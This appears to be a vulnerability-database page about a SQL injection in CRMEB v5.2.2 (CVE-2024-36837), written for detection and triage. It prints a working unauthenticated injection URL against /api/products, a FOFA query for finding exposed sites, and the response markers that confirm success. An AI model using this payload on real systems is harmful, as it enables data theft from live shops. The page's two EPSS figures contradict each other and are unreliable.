cbcvebase.
CVE-2024-36837
published 2024-06-05

CVE-2024-36837: SQL Injection vulnerability in CRMEB v.5.2.2 allows a remote attacker to obtain sensitive information via the getProductList function in the…

PriorityP260high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
EXPLOIT
EPSS
8.31%
94.2th percentile
SQL Injection vulnerability in CRMEB v.5.2.2 allows a remote attacker to obtain sensitive information via the getProductList function in the ProductController.php file.

Affected

1 ranges
VendorProductVersion rangeFixed in
crmebcrmeb

Detection & IOCsextracted from sources · hover to see the quote

url/api/products?limit=20&priceOrder=&salesOrder=&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5({{num}})))),0x7e),3550)
path/api/products
pathProductController.php
  • SQL injection payload is delivered via the `selectId` GET parameter on the `/api/products` endpoint using a GTID_SUBSET-based blind/error injection technique.
  • A successful exploitation response returns HTTP 200 with Content-Type `application/json` and contains both the MD5 hash of the injected integer and the string `SQLSTATE` in the response body.
  • FOFA fingerprinting query `title="CRMEB"` can be used to identify exposed CRMEB instances potentially vulnerable to this CVE.
  • The vulnerability is triggered through the `getProductList` function inside `ProductController.php`; monitor GET requests to `/api/products` with a `selectId` parameter containing SQL function calls such as `GTID_SUBSET`, `CONCAT`, `ELT`, or `md5`.
  • ·The Nuclei template uses a randomised integer (`rand_int(9000000, 9999999)`) as the injection payload seed and matches its MD5 hash in the response body, meaning detection signatures must account for a variable payload rather than a static string.
  • ·The exploit requires only a single unauthenticated GET request (`max-request: 1`), lowering the bar for mass scanning and exploitation.
  • ·EPSS score of 0.91665 (99.68th percentile) indicates very high real-world exploitation probability; treat detections as high-priority.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.